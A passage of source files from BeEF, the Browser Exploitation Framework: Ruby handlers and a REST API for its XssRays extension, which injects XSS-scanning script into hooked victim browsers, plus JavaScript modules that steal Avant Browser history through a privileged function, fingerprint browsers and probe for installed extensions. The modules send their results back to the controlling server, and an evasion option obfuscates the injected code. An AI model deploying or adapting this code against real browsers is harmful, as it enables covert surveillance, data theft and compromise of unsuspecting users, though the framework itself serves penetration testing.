XS.find(rays_scan_id) hooked_browser = HB.where(session: params[:hbsess]).first if xssrays_scan.nil? print_error '[XSSRAYS] Invalid scan' return end xssrays_detail = XD.new( hooked_browser_id: hooked_browser.session, vector_name: params[:n], vector_method: params[:m], vector_poc: params[:p], xssraysscan_id: xssrays_scan.id ) xssrays_detail.save print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked domain [#{hooked_browser.domain}]") print_debug("[XSSRAYS] Ray info: \n #{request.query_string}") end # finalize the XssRays scan marking the scan as finished in the db def finalize_scan(rays_scan_id) xssrays_scan = BeEF::Core::Models::Xssraysscan.find(rays_scan_id) if xssrays_scan.nil? print_error '[XSSRAYS] Invalid scan' return end xssrays_scan.update(is_finished: true, scan_finish: Time.now) print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] finished at [#{xssrays_scan.scan_finish}]") end end end end end
Ruby
beef/extensions/xssrays/api/scan.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Xssrays module API class Scan include BeEF::Core::Handlers::Modules::BeEFJS # # Add the xssrays main JS file to the victim DOM if there is a not-yet-started scan entry in the db. # def start_scan(hb, body) @body = body config = BeEF::Core::Configuration.instance hb = BeEF::Core::Models::HookedBrowser.find(hb.id) # TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested # TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want xs = BeEF::Core::Models::Xssraysscan.where(hooked_browser_id: hb.id, is_started: false).first # stop here if there are no XssRays scans to be started return if xs.nil? || xs.is_started == true # set the scan as started xs.update(is_started: true) # build the beefjs xssrays component # the URI of the XssRays handler where rays should come back if the vulnerability is verified beefurl = BeEF::Core::Server.instance.url cross_domain = xs.cross_domain timeout = xs.clean_timeout ws = BeEF::Core::Websocket::Websocket.instance # TODO: antisnatchor: prevent sending "content" multiple times. # Better leaving it after the first run, and don't send it again. # todo antisnatchor: remove this gsub crap adding some hook packing. # If we use WebSockets, just reply wih the component contents if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path('beef.net.xssrays')).gsub('// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file \'doc/COPYING\' for copying permission //', '') add_to_body xs.id, hb.session, beefurl, cross_domain, timeout if config.get('beef.extension.evasion.enable') evasion = BeEF::Extension::Evasion::Evasion.instance ws.send(evasion.obfuscate(content) + @body, hb.session) else ws.send(content + @body, hb.session) end # If we use XHR-polling, add the component to the main hook file else build_missing_beefjs_components 'beef.net.xssrays' add_to_body xs.id, hb.session, beefurl, cross_domain, timeout end print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}].") end def add_to_body(id, session, beefurl, cross_domain, timeout) config = BeEF::Core::Configuration.instance req = %{ beef.execute(function() { beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout}); }); } if config.get('beef.extension.evasion.enable') evasion = BeEF::Extension::Evasion::Evasion.instance @body << evasion.obfuscate(req) else @body << req end end end end end end end
Ruby
beef/extensions/xssrays/models/xssraysdetail.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Store the rays details, basically verified XSS vulnerabilities # class Xssraysdetail < BeEF::Core::Model belongs_to :hooked_browser belongs_to :xssraysscan end end end end
Ruby
beef/extensions/xssrays/models/xssraysscan.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Store the XssRays scans started and finished, with relative ID # class Xssraysscan < BeEF::Core::Model has_many :xssrays_details end end end end
Ruby
beef/extensions/xssrays/rest/xssrays.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Xssrays # This class handles the routing of RESTful API requests for XSSRays class XssraysRest < BeEF::Core::Router::Router # Filters out bad requests before performing any routing before do config = BeEF::Core::Configuration.instance # Require a valid API token from a valid IP address halt 401 unless params[:token] == config.get('beef.api_token') halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip) CLEAN_TIMEOUT = config.get('beef.extension.xssrays.clean_timeout') || 3_000 CROSS_DOMAIN = config.get('beef.extension.xssrays.cross_domain') || true HB = BeEF::Core::Models::HookedBrowser XS = BeEF::Core::Models::Xssraysscan XD = BeEF::Core::Models::Xssraysdetail headers 'Content-Type' => 'application/json; charset=UTF-8', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end # Returns the entire list of rays for all zombies get '/rays' do rays = XD.all.distinct.order(:id) count = rays.length result = {} result[:count] = count result[:rays] = [] rays.each do |ray| result[:rays] << ray2hash(ray) end result.to_json rescue StandardError => e print_error "Internal error while retrieving rays (#{e.message})" halt 500 end # Returns all rays given a specific hooked browser id get '/rays/:id' do id = params[:id] rays = XD.where(hooked_browser_id: id).distinct.order(:id) count = rays.length result = {} result[:count] = count result[:rays] = [] rays.each do |ray| result[:rays] << ray2hash(ray) end result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while retrieving rays list for hooked browser with id #{id} (#{e.message})" halt 500 end # Returns the entire list of scans for all zombies get '/scans' do scans = XS.distinct.order(:id) count = scans.length result = {} result[:count] = count result[:scans] = [] scans.each do |scan| result[:scans] << scan2hash(scan) end result.to_json rescue StandardError => e print_error "Internal error while retrieving scans (#{e.message})" halt 500 end # Returns all scans given a specific hooked browser id get '/scans/:id' do id = params[:id] scans = XS.where(hooked_browser_id: id).distinct.order(:id) count = scans.length result = {} result[:count] = count result[:scans] = [] scans.each do |_scans| result[:scans] << scan2hash(scan) end result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while retrieving scans list for hooked browser with id #{id} (#{e.message})" halt 500 end # Starts a new scan on the specified zombie ID post '/scan/:id' do id = params[:id] hooked_browser = HB.where(session: id).distinct.order(:id).first if hooked_browser.nil? print_error '[XSSRAYS] Invalid hooked browser ID' return end # set Cross-domain settings cross_domain = params[:cross_domain].to_s cross_domain = if cross_domain == '' CROSS_DOMAIN else cross_domain != 'false' end # set clean timeout settings clean_timeout = params[:clean_timeout].to_s clean_timeout = CLEAN_TIMEOUT if clean_timeout == '' || !Filters.alphanums_only?(clean_timeout) xssrays_scan = XS.new( hooked_browser_id: hooked_browser.id, scan_start: Time.now, domain: hooked_browser.domain, # check also cross-domain URIs found by the crawler cross_domain: cross_domain, # how long to wait before removing the iFrames from the DOM (5000ms default) clean_timeout: clean_timeout ) xssrays_scan.save print_info( "[XSSRays] Starting XSSRays [ip:#{hooked_browser.ip}], " \ "hooked domain [#{hooked_browser.domain}], " \ "cross-domain: #{cross_domain}, " \ "clean timeout: #{clean_timeout}" ) result = scan2hash(xssrays_scan) print_debug "[XSSRays] New scan: #{result}" # result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while creating XSSRays scan on zombie with id #{id} (#{e.message})" halt 500 end private # Convert a ray object to JSON def ray2hash(ray) { id: ray.id, hooked_browser_id: ray.hooked_browser_id, vector_name: ray.vector_name, vector_method: ray.vector_method, vector_poc: ray.vector_poc } end # Convert a scan object to JSON def scan2hash(scan) { id: scan.id, hooked_browser_id: scan.hooked_browser_id, scan_start: scan.scan_start, scan_finish: scan.scan_finish, domain: scan.domain, cross_domain: scan.cross_domain, clean_timeout: scan.clean_timeout, is_started: scan.is_started, is_finished: scan.is_finished } end # Raised when invalid JSON input is passed to an /api/xssrays handler. class InvalidJsonError < StandardError DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/xssrays handler'.freeze def initialize(message = nil) super(message || DEFAULT_MESSAGE) end end # Raised when an invalid named parameter is passed to an /api/xssrays handler. class InvalidParamError < StandardError DEFAULT_MESSAGE = 'Invalid parameter passed to /api/xssrays handler'.freeze def initialize(message = nil) str = 'Invalid "%s" parameter passed to /api/xssrays handler' message = format str, message unless message.nil? super(message) end end end end end end
JavaScript
beef/modules/browser/avant_steal_history/command.js
// // Copyright (c) 2006-2023Wade Alcorn [email protected] // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // beef.execute(function() { if (!beef.browser.isA()) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser."); return; } var avant_iframe = document.createElement("iframe"); //var avant_iframe = beef.dom.createInvisibleIframe(); avant_iframe.setAttribute('src', 'browser:home'); avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>'); avant_iframe.setAttribute('width', '0'); avant_iframe.setAttribute('heigth', '0'); avant_iframe.setAttribute('scrolling','no'); avant_iframe.setAttribute('style', 'display:none'); document.body.appendChild(avant_iframe); var vstr = {value: ""}; if (window['avant_history_<%= @command_id %>'].navigator) { //This works if FF is the rendering engine window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value); } else { // this works if Chrome is the rendering engine //window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox."); } });
YAML
beef/modules/browser/avant_steal_history/config.yaml
# # Copyright (c) 2006-2023Wade Alcorn [email protected] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # beef: module: avant_steal_history: enable: true category: "Browser" name: "Get Visited URLs (Avant Browser)" description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only." authors: ["Roberto Suggi Liverani"] target: working: ["FF"]
Ruby
beef/modules/browser/avant_steal_history/module.rb
# # Copyright (c) 2006-2023Wade Alcorn [email protected] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # class Avant_steal_history < BeEF::Core::Command def self.options [ { 'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/browser/browser_fingerprinting/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var browser_type = new Array; var browser_version = new Array; var dom = document.createElement('b'); function unique(array) { return $.grep(array, function(el, index) { return index === $.inArray(el, array); }); } parse_browser_details = function() { if (!browser_type.length) browser_type[0] = "unknown"; if (!browser_version.length) browser_version[0] = "unknown"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser_type="+unique(browser_type)+"&browser_version="+unique(browser_version)); }; // Browser fingerprints // in the form of: "URI","Browser","version(s)" var fingerprints = new Array( new Array("Safari","1+","feed://__rsrc__/__rsrc__/NextPage.tif"), new Array("Firefox","1+","moz-icon://.autoreg?size=16"), new Array("Firefox","2","resource:///res/html/gopher-audio.gif"), new Array("Firefox","2-3","jar:resource:///chrome/classic.jar!/skin/classic/browser/Secure.png"), new Array("Firefox","4-5","resource:///chrome/browser/skin/classic/browser/Secure.png"), new Array("Firefox","1-6","resource:///chrome/browser/content/branding/icon128.png"), new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"), new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"), new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"), new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"), new Array("Firefox","10+","chrome://browser/skin/sync-128.png"), new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"), new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"), new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"), new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"), new Array("Internet Explorer","7+", "res://ieframe.dll/info_48.png"), new Array("Internet Explorer","10+","res://ieframe.dll/immersivelogo.png"), new Array("Tor Browser","1+","chrome://browser/content/abouttbupdate/aboutTBUpdateLogo.png") ); for (var i=0; i<fingerprints.length; i++) { var img = new Image; img.id = fingerprints[i][0]; img.name = fingerprints[i][1]; img.src = fingerprints[i][2]; img.onload = function() { browser_type.push(this.id); browser_version.push(this.name); dom.removeChild(this); } dom.appendChild(img); } setTimeout('parse_browser_details();', 2000); });
YAML
beef/modules/browser/browser_fingerprinting/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: browser_fingerprinting: enable: true category: "Browser" name: "Fingerprint Browser (PoC)" description: "This module attempts to fingerprint the browser type and version using URI protocol handlers unique to Safari, Internet Explorer and Mozilla Firefox." authors: ["bcoles"] target: working: ["IE", "FF", "S"] not_working: ["ALL"]
Ruby
beef/modules/browser/browser_fingerprinting/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # Uses methods described here: # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/ class Browser_fingerprinting < BeEF::Core::Command def post_execute content = {} content['browser_type'] = @datastore['browser_type'] unless @datastore['browser_type'].nil? content['browser_version'] = @datastore['browser_version'] unless @datastore['browser_version'].nil? content['fail'] = 'Failed to fingerprint browser.' if content.empty? save content end end
JavaScript
beef/modules/browser/detect_activex/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = (beef.browser.hasActiveX())? "Yes" : "No"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result); });
YAML
beef/modules/browser/detect_activex/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_activex: enable: true category: "Browser" name: "Detect ActiveX" description: "This module will check if the browser has ActiveX support." authors: ["bcoles"] target: user_notify: ["IE"] not_working: ["All"]
Ruby
beef/modules/browser/detect_activex/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_activex < BeEF::Core::Command def post_execute content = {} content['activex'] = @datastore['activex'] save content activex = @datastore['results'].scan(/^activex=(Yes|No)/).flatten.first return unless activex BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', activex) end end
JavaScript
beef/modules/browser/detect_evernote_clipper/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = ""; var s = document.createElement('script'); s.onload = function() { result = "Detected through presense of extension content script."; beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result); } s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js'; document.body.appendChild(s); var evdiv = document.getElementById('evernoteGlobalTools'); if (typeof(evdiv) != 'undefined' && evdiv != null) { // Evernote Web Clipper must have been active as well, because we can detect one of the iFrames iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page"; beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult); } setTimeout(function() { if (result == "") { beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected"); } document.body.removeChild(s); }, 2000); });
YAML
beef/modules/browser/detect_evernote_clipper/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: detect_evernote_clipper: enable: true category: "Browser" name: "Detect Evernote Web Clipper" description: "This module checks if the Evernote Web Clipper extension is installed and active." authors: ["xntrik"] target: not_working: ["IE"] working: ["C"]
Ruby
beef/modules/browser/detect_evernote_clipper/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Detect_evernote_clipper < BeEF::Core::Command def post_execute content = {} content['evernote_clipper'] = @datastore['evernote_clipper'] unless @datastore['evernote_clipper'].nil? save content end end
JavaScript
beef/modules/browser/detect_extensions/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { chrome_extensions = new Array( new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"), new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"), new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"), new Array("aknpkdffaafgjchaibgeefbgmgeghloj","Angry Birds"), new Array("gighmmpiobklfepjocnamgkkbiglidom","AdBlock"), new Array("cfhdojbkjhnklbpkdaibdccddilifddb","Adblock Plus (Beta)"), new Array("ejjicmeblgpmajnghnpcppodonldlgfn","Google Calendar"), new Array("mihcahmgecmbnbcchbopgniflfhgnkff","Google Mail Checker"), new Array("lneaknkopdijkpnocmklfnjbeapigfbh","Google Maps"), new Array("elioihkkcdgakfbahdoddophfngopipi","FB Photo Zoom"), new Array("mmcegpfdgcoclcdfkjahiimlikdpnina","Plants vs Zombies"), new Array("apdfllckaahabafndbhieahigkjlhalf","Google Docs"), new Array("bfbmjmiodbnnpllbbbfblcplfjjepjdn","Turn Off the Lights"), new Array("ejidjjhkpiempkbhmpbfngldlkglhimk","Offline Google Mail"), new Array("pioclpoplcdbaefihamjohnefbikjilc","Evernote Web Clipper"), new Array("aapbdbdomjkkjkaonfhkkikfgjllcleb","Google Translate"), new Array("oadboiipflhobonjjffjbfekfjcgkhco","Google Chrome to Phone Extension"), new Array("inmnggcpelemfookhlhkdfbechcdadfp","Picnik"), new Array("hehijbfgiekmjfkfjpbkbammjbdenadd","IE Tab"), new Array("hbdpomandigafcibbmofojjchbcdagbl","TweetDeck"), new Array("mmimngoggfoobjdlefbcabngfnmieonb","Google Books"), new Array("mgijmajocgfcbeboacabfgobmjgjcoja","Google Dictionary (by Google)"), new Array("alelhddbbhepgpmgidjdcjakblofbmce","Awesome Screenshot: Capture \\u0026 Annotate"), new Array("lbfehkoinhhcknnbdgnnmjhiladcgbol","Evernote Web"), new Array("ciagpekplgpbepdgggflgmahnjgiaced","Add to Amazon Wish List"), new Array("mmffncokckfccddfenhkhnllmlobdahm","FastestWeb - Browse Faster"), new Array("onlgmecjpnejhfeofkgbfgnmdlipdejb","Picasa"), new Array("fjnbnpbmkenffdnngjfgmeleoegfcffe","Stylish"), new Array("keembkgclppcbilkekfgpobhldjjhpmn","Cargo Bridge"), new Array("adpkifcfcacgmnggcbpbjbkdijciiigm","Bejeweled"), new Array("pgjchkcfmigkkhedgjedmffdepgmpfil","Psykopaint"), new Array("poknhlcknimnnbfcombaooklofipaibk","Canvas Rider"), new Array("mijlebbfndhelmdpmllgcfadlkankhok","Quick Note"), new Array("cgbogdmdefihhljhfeiklfiedefalcde","AddThis - Share \\u0026 Bookmark (new)"), new Array("ckibcdccnfeookdmbahgiakhnjcddpki","Webpage Screenshot"), new Array("loamdenijebhollnjgehcfbnpeelfhlk","The Fancy Pants Adventure: World 2"), new Array("cknghehebaconkajgiobncfleofebcog","Monster Dash"), new Array("lfkgmnnajiljnolcgolmmgnecgldgeld","Smooth Gestures"), new Array("kcnhkahnjcbndmmehfkdnkjomaanaooo","Google Voice (by Google)"), new Array("iajlkcpgcnbhfhpdeooockfaincfkjjj","Isoball 3"), new Array("dgpdioedihjhncjafcpgbbjdpbbkikmi","Speed Dial"), new Array("knkapnclbofjjgicpkfoagdjohlfjhpd","Little Alchemy"), new Array("bmagokdooijbeehmkpknfglimnifench","Firebug Lite for Google Chrome\u2122"), new Array("cgdllcbmneiklcmbeclfegccdjholomb","Bouncy Mouse"), new Array("ajpgkpeckebdhofmmjfgcjjiiejpodla","Xmarks Bookmark Sync"), new Array("hndllphbhpadfpoikpaofkkkpkpnmjik","Troll Emoticons"), new Array("lfbgimoladefibpklnfmkpknadbklade","Webcam Toy"), new Array("agoenciogemlojlhccbcpcfflicgnaak","BIODIGITAL HUMAN"), new Array("pjjhlfkghdhmijklfnahfkpgmhcmfgcm","Google Reader"), new Array("ehcibdjmpjlekgjhepbfmenfppliikcj","Pixlr-o-matic"), new Array("bhmmomiinigofkjcapegjjndpbikblnp","WOT"), new Array("icpgjfneehieebagbmdbhnlpiopdcmna","New Tab Redirect!"), new Array("ihdkejbciahopmbagpnjmmkkdpfpaaak","Weather Window by WeatherBug"), new Array("dlifoiidlkcpdlchhngenehnhcadakpl","Toss it"), new Array("hpakbhbnhkbghdcejiiangcefallmaln","Bubble Shooter"), new Array("dcilimldmomiaihcfkmaldanopfejefg","WGT Golf Challenge"), new Array("kcahibnffhnnjcedflmchmokndkjnhpg","StumbleUpon"), new Array("ejnkaeblpdcamcioiiabclakabcbjmbl","Box - 5 GB Free Storage"), new Array("edfkoljdeffeedleidebkmmamepgbnbl","The Godfather: Five Families"), new Array("hcchbhjknakkndfpdbapmdkhbbgojkno","Air Hockey"), new Array("jgoepmocgafhnchmokaimcmlojpnlkhp","Google +1 Button"), new Array("fkkaebihfmbofclegkcfkkemepfehibg","Full Screen Weather"), new Array("kdmmkfaghgcicheaimnpffeeekheafkb","Autodesk Homestyler"), new Array("nmameahlembdcigphohgiodcgjomcgeo","Facebook Notifications"), new Array("bfegaehidkkcfaikpaijcdahnpikhobf","Gismeteo"), new Array("bkgoccjhfjgjedhkiefaclppgbmoobnk","Audiotool"), new Array("gheikhdfflhlbemfmhcfpeblehemeklp","Planetarium"), new Array("hjhfaknohpjconjoefidanhihokmkice","Marvel Comics"), new Array("fkmopoamfjnmppabeaphohombnjcjgla","Springpad"), new Array("bfbameneiokkgbdmiekhjnmfkcnldhhm","Web Developer"), new Array("gemohgpikgjbgmdfbfjdailocichgbjm","3D Bowling "), new Array("hdokiejnpimakedhajhdlcegeplioahd","LastPass"), new Array("lkpikhjbfbffdblahfidklcohlaeabak","Fieldrunners"), new Array("ghgabhipcejejjmhhchfonmamedcbeod","Click\\u0026Clean"), new Array("jdheeblenjmceeppomdgokgilmkonced","Lord of Ultima"), new Array("beobeededemalmllhkmnkinmfembdimh","TV"), new Array("faminaibgiklngmfpfbhmokfmnglamcm","PanicButton"), new Array("mpedbpkelbhcbkdaglillalioeeekbpb","WGT Golf Game"), new Array("bhoaojooagiaaiidlnfhkkafjpbbnnno","SKiD Racer"), new Array("icppfcnhkcmnfdhfhphakoifcfokfdhg","Google Music"), new Array("amigcgbheognjmfkaieeeadojiibgbdp","TooManyTabs for Chrome"), new Array("khpikpdaalmlcipfphefaajfiofglcma","Gravity Duck"), new Array("oohphhdkahjlioohbalmicpokoefkgid","Bastion"), new Array("nonjdcjchghhkdoolnlbekcfllmednbl","Hover Zoom"), new Array("khgabmflimjjbclkmljlpmgaleanedem","SparkChess"), new Array("dajedkncpodkggklbegccjpmnglmnflm","Search by Image (by Google)"), new Array("hlpiaibleklmjieibbnmkignbggodmmj","Cargo Bridge: Armor Games Edition"), new Array("ifphbghhodpimajnjejgjlfcjmnnkhci","Gun Blood"), new Array("iblenkmcolcdonmlfknbpbgjebabcoae","We Heart It"), new Array("haebnnbpedcbhciplfhjjkbafijpncjl","TinEye Reverse Image Search"), new Array("gdkjifoifglkpcdffkenpinlbjgephlo","Digital Clock"), new Array("ciamkmigckbgfajcieiflmkedohjjohh","Gun Bros"), new Array("jkcieoaeooeidmpaopkpjpjfakidlabm","Typing Test - KeyHero"), new Array("dcjeclnkejmbepoibfnamioojinoopln","AutoCAD WS"), new Array("apfkepiiddolifkgjmfdgpnipgnfejab","BeFunky Photo Editor"), new Array("decdfngdidijkdjgbknlnepdljfaepji","Read Later Fast"), new Array("apboafhkiegglekeafbckfjldecefkhn","LucidChart - Collaborative Diagramming"), new Array("ecmphppfkcfflgglcokcbdkofpfegoel","NYTimes"), new Array("jfppgkomfopklagggkjiaddgndkgopgl","Google Translate for Google+"), new Array("imcbnnnoghiihopefblgehihofbfbmei","Desprotetor de Links"), new Array("hgbpjlnkjhllfgfdmieompodgaefjcfh","Flixster"), new Array("pjpokfkdchapbkfpkmeiebmlfafbljla","3D Tennis"), new Array("bcjbagclppcgdbpobcpoojdjdmcjhpid","Missing e"), new Array("dcbegflbljflchoahmigblmabofoinkh","Counter Strike ( Flash Version )"), new Array("boemmnepglcoinjcdlfcpcbmhiecichi","Google+ Notifications"), new Array("iooicodkiihhpojmmeghjclgihfjdjhj","Clearly"), new Array("iflpcokdamgefbghpdipcibmhlkdopop","The Weather Channel for Chrome"), new Array("jlehaidnnmjjkhgbbiombcdifogolhap","Skyrama"), new Array("neojceinbonpjjcokpokpeobkhcpiloc","Mahjong Solitaire"), new Array("nhalnajmigjnpjpdbpkpgfhekbjmolhp","Curling"), new Array("agljkoinmcdnopnlbhhjibjiablccgoh","Radio"), new Array("pjejbgheonogbpfkkjigbmahaljipoej","Weather Underground"), new Array("alcobafdkcddhiabfgnongafffchimnl","Word Search Puzzle"), new Array("bhgepjadamfimjcgoiocemneabhaenai","Jumpless"), new Array("dafkakmjmhfnnfclmjdfpnbmdeddkoeo","Aviary Image Editor"), new Array("cedbddnnmhgnedpamoenmdkhnpnfbpjb","Pool"), new Array("ejpepffjfmamnambagiibghpglaidiec","Facebook Disconnect"), new Array("bmbnpkmmbmniajjhocmmgblekhhmffge","Stunt Dirt Bike"), new Array("lkllajgbhondgjjnhmmgbjndmogapinp","Sketchpad"), new Array("dglbaehakkaojfihjkgkpknbjldhhmmn","Dead Frontier"), new Array("fnfnbeppfinmnjnjhedifcfllpcfgeea","IE Tab Multi (Enhance)"), new Array("ijhlikjoigjegofbedmfmlcfkmhabldh","ESPN Cricinfo"), new Array("lcdhpokmalcfjnfkjlfncgekebcojinn","Steambirds: Survival"), new Array("aidgmjkfmbhldhnhkopojimkhhhcpenl","Beat the Boot (by Google)"), new Array("akpelnjfckgfiplcikojhomllgombffc","Theme Creator"), new Array("hfpeacgpdnhofhebmincihdelcemhagd","Creatures \\u0026 Castles"), new Array("jpnjjlbngpejmmhgcaagljaomgnginml","IP Address"), new Array("lambangeielkjcnmioccboaphdfcffib","TV for Google Chrome\u2122"), new Array("clkfdgnfefjmciocbhnffnbpkjpdleca","FARMERAMA"), new Array("ppelffpjgkifjfgnbaaldcehkpajlmbc","iReader"), new Array("kbgdenhobifcbckaiohandoodkepleif","Green Farm"), new Array("liglcienpnkhdajdfmnpbgmpjglonipe","Numerics Calculator \\u0026 Converter"), new Array("omlmnomieeknagejjojcpdomnbnbchdl","Sinuous"), new Array("manlnjcghdempjdpndlcmaaobbighhcf","Dragons of Atlantis"), new Array("neimpplmbdhflkfojgmplkgflkgmodpd","Nyan Cat"), new Array("dllkocilcinkggkchnjgegijklcililc","Google News"), new Array("namljbfbglehfnlonjmebceimaalofei","deviantART muro"), new Array("keigpnkjljkelclbjbekcfnaomfodamj","Shopping Assistant"), new Array("mmgagnmbebdebebbcleklifnobamjonh","AutoPager Chrome"), new Array("mohjjmefnkbafiajlccpfglfpdfdemmj","Poppit Stress Buster"), new Array("fcgckldmmjdbpdejkclmfnnnehhocbfp","Google Finance"), new Array("gcmhlmapohffdglflokbgknlknnmogbb","The QR Code Generator"), new Array("hkpcelemhneoooapbbopolpjhmbfmnbf","NPR for Chrome"), new Array("bpllmoilcakpgbeodibeifcfnndoheam","Facebook Colour Changer"), new Array("mlomiejdfkolichcflejclcbmpeaniij","Ghostery"), new Array("cohkjfondhjjfehnehlpmjpljpihfhfc","Street Racers"), new Array("ddeoimiimmmfddbiggnbipkjomlalanb","Fun Switcher"), new Array("gemgfpodpjapjhfohdlibagceiknakpa","Chain Reaction"), new Array("ggnidjbcahhbnleinchgobfnabopeioh","Stopwatch"), new Array("icdipabjmbhpdkjaihfjoikhjjeneebd","Cloud Reader"), new Array("omeengfjefdmhnkojnfmncpfdbhnecea","SlideRocket"), new Array("ihffmkcfkejomlfnilnmkokcpgclhfeg","Forecastfox"), new Array("femoooemgmjaebeodbbikbkmhlafenpl","Causality Games"), new 